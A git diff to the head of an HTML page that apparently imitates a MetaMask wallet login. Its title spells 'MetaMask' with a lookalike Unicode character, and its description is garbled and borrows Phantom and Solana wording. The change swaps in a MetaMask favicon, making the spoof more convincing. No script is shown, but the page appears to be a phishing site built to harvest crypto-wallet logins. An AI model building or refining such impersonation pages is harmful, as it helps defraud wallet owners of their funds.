--- a/index.html
+++ b/index.html
@@ -4,7 +4,7 @@
 <meta charset="UTF-8">
 <meta name="viewport" content="width=device-width, initial-scale=1.0">
 <meta name="description" content="Metamask is the top-rated and most secured Solana blockchain wallet that let your store, send, receive, collect, and swap tokens. You can use Phantom to manage SOL-based currencies such">
-<link rel="icon" type="image/x-icon" href="/">
+<link rel="icon" type="image/x-icon" href="/metamask_icon.png">
 <title>Met𝓪Mask Login | Login | Signup</title>
  
 <link href="https://fonts.googleapis.com/css2?family=Open+Sans:ital,wght@0,300;0,400;0,500;0,600;0,700;0,800;1,300;1,400;1,500;1,600;1,700;1,800&family=Poppins:ital,wght@0,100;0,200;0,300;0,400;0,500;0,600;0,700;0,800;0,900;1,100;1,200;1,300;1,400;1,500;1,600;1,700;1,800;1,900&family=Roboto:ital,wght@0,100;0,300;0,400;0,500;0,700;0,900;1,100;1,300;1,400;1,500;1,700;1,900&display=swap" rel="stylesheet">
